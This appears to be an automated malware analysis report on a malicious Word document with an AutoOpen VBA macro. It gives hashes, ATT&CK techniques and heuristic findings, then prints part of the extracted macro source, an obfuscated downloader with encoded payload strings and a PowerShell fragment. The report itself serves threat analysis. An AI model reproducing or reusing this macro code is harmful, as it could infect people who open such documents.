Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9e6347d840acc5ef…

MALICIOUS

Office (OLE)

165.5 KB Created: 2018-04-12 08:30:00 Authoring application: Microsoft Office Word First seen: 2019-01-20
MD5: d0e02f082be06ec80ea148a87c26298b SHA-1: 70e9be169aef065f54299cc3dec9b6fb64a2e44f SHA-256: 9e6347d840acc5ef86f644b33e93a0ab84d21cfd41d01da1add0c81c8bae9bcf
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, including an AutoOpen macro, which is a common technique for malicious documents. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, suggesting an attempt to execute arbitrary commands. The presence of the 'macros.bas' artifact further confirms the macro-based nature of the threat. The script's obfuscated nature and the Shell() call strongly imply it's designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 145645 bytes
SHA-256: cbcb4be36dbbb8b160fc863f1622d8de477dcf0020034c69fb8b3d9731f1f70f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 34 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "APVizGouWKrjX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
ZrWQE = CByte(XKhEN)
LrRim = AmwFio
pqunD = Cos(2693 - Oct(77784 + wODzu * OAZmOI - CBool(TEaiZ)))
Application.Run tJLUI + "jXPwwWIQJ" + CPbcXd, YMMcO + TZzzjzHSvu + rMllXT
fDVlU = CByte(ijusm)
uRrWnY = ILkwG
MDhHHY = Cos(77872 - Oct(1975 + CztpIT * VdUaiT - CBool(AqwNV)))
End Sub

Attribute VB_Name = "IvEPKHAz"
Sub nUztH(scwQi)
pGift = CByte(phRJLS)
fGuiiA = Cwqzd
MzHNAw = Cos(75134 - Oct(3962 + pakRN * QHdJi - CBool(bHwwT)))
End Sub
Function TZzzjzHSvu()
On Error Resume Next
jJbZOz = CByte(Zrjuc)
JKiYW = TOTLqP
dFTwEm = Cos(28073 - Oct(4551 + YdjQMr * SGLDv - CBool(hlzbC)))
OawhQizu = VJpSA("uu.uwE2ADEANAA4ADEAYgA0AGUAMwA4ADMANAA5AGYAOQAwADYAZgA1ADQAMAAxADUAMwAyAGYAOAA2ADYAYwBlADIAOQA4ADjKo", 7 + iuZBlf - iuZBlf, 91 + iuZBlf - iuZBlf)
kMzlJS = CByte(JGsbI)
HOlFp = hcpBF
MAYXiA = Cos(57497 - Oct(68904 + ShasZw * hSZiDq - CBool(qwjIVU)))
tjhzm = CByte(EAchk)
hrVaf = IrEomE
pYkUpr = Cos(40275 - Oct(77928 + vaGSXL * nwLPE - CBool(BZjiX)))
qopGlKTAz = VJpSA("2NqNgA1AGUANwA1ADUAZAAyAGEANwAxADYAZQAwADUAYQA4AGUbmT", 4 + uLsGzR - uLsGzR, 47 + uLsGzR - uLsGzR)
qvEwdE = CByte(sUjmpP)
iwvTNc = URsbpq
WLnHUo = Cos(96511 - Oct(6972 + idOZTC * JVzVi - CBool(dNVuj)))
FQkzS = CByte(COhwY)
zurGj = TukEBb
VEWYtZ = Cos(62357 - Oct(42505 + JhJYlG * fOZkz - CBool(NJrRoE)))
cbSnYd = VJpSA("LWNgA2AGYAMwAwAGYAMQA1AGUAOQA2ADEAYwAyADkAMwBkAGIAZAA3AGMAZQAzADQAMAA5AGMANwA2AGEAYQAwAGUAZAA5AD6zW8", 3 + iMUnO - iMUnO, 94 + iMUnO - iMUnO)
UAPIF = CByte(QfqoYs)
ZlJzIG = dEqbr
rqNjbl = Cos(53667 - Oct(36864 + IRASo * koZArP - CBool(czuJh)))
jBPHo = CByte(oQNqFR)
cQDQG = dvbIU
klfLHO = Cos(78972 - Oct(96995 + wQvvkv * PJlZwv - CBool(TEJil)))
ZPGrzC = VJpSA("zLi7u0ADQAYwA2AGYAMgAzADQANgA0ADMAOAA4ADIANABkAGEANQAwADUAYgA1ADQAYwBlAqh", 7 + ZPKnRK - ZPKnRK, 65 + ZPKnRK - ZPKnRK)
bFtvOD = CByte(IFGcQ)
YdzIU = XhjRW
vpjMGz = Cos(68774 - Oct(6924 + RtXAj * hnJDJJ - CBool(WbUwoI)))
tCMzXJ = CByte(Rzzjs)
MVWmWw = ZcfNRi
uhGMG = Cos(23232 - Oct(48858 + uQERo * Fvmwi - CBool(OCTQo)))
tRwRPQIq = VJpSA("whADcLYZKIbr", 3 + DvnWA - DvnWA, 3 + DvnWA - DvnWA)
zPQWw = CByte(slOjtk)
fLEbGi = IrUht
iGJsN = Cos(82195 - Oct(46269 + OJrYRW * DtVCB - CBool(CMJaN)))
dCPujD = CByte(amlMwQ)
JzCvA = iGQKb
qQVfJ = Cos(61545 - Oct(65042 + biWZHX * uGmIL - CBool(DzFnw)))
IjbEPiotzU = VJpSA("iSQiQAOAA5ADMANQBlADYAMwA2AGYAYwA5ADEANwBmAGYAYQBmAGIAZQA1ADMAZABhADcANAAzAGIAYgBmADkAYwAwADMAZABhAGIAOQAwAGQAMWT", 5 + jOGvjc - jOGvjc, 107 + jOGvjc - jOGvjc)
JUWlFT = CByte(NdEGc)
QSbabd = cFjAiB
AmSPs = Cos(21736 - Oct(6255 + iEzQF * KipzKb - CBool(EcWiKK)))
PabSfF = CByte(SvjVm)
MCiSQ = IzEdX
WQFURG = Cos(98612 - Oct(66520 + FMCQlK * lkjEl - CBool(clQDuO)))
wwQJni = VJpSA("YobAGIANABkAGEANgBjAGMAWS.v", 4 + EkWHE - EkWHE, 20 + EkWHE - EkWHE)
vLzDpJ = CByte(zzidWE)
HqfBi = vMTwS
doTENL = Cos(70698 - Oct(85119 + uOwbc * QnGCi - CBool(oVvkBP)))
mqBKE = CByte(kiPjJ)
GMtGm = TkOsGG
FifIwX = Cos(59551 - Oct(12654 + OvpXAJ * nqiXk - CBool(HCwhL)))
VkiCc = VJpSA("@wBlADMAMAA5AGEANwA5AGEAZQA1AGYAMgA1ADkAMgA1ADAANQBkADMAMAA2ADYANgBhAGYAOIuT@7bt", 2 + vjrAk - vjrAk, 72 + vjrAk - vjrAk)
nuuku = CByte(zhEaS)
iSJwz = PjKPb
YiNzb = Cos(56171 - Oct(19162 + LTTDT * uKBbQ - CBool(XYtSw)))
sdNIRM = CByte(GcGoF)
jiwVj = mLJwh
JLIoPX = Cos(51372 - Oct(60400 + VXFRm * nPauz - CBool(TYnvio)))
OViviM = VJpSA("6%3BzAGUAYgA0AGMAZAA5AGMAMQBjADEANgA0AGEANQBmAGYANABlAGYANgA4ADIAZAA1AGEANQ0b", 5 + EjSfB - EjSfB, 71 + EjSfB - EjSfB)
AcjifV = CByte(AQSMj)
awOGs = uMzwi
iqqnU = Cos(86167 - Oct(64698 + lfslsZ * iAWzOL - CBool(WVKhDi)))
FvTFhJ = CByte(HiEkbG)
DSoHz = KWqYtj
sVHvzM = Cos(33935 - Oct(84811 + oiuDbJ * nLOjp - CBool(jldlz)))
chjzjTEi = VJpSA("KH([RuntIme.iNTeroPsErVICES.mARshAL]::PtRToStRinGUNi([RUNtimE.INTEroPSeRVICeS.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.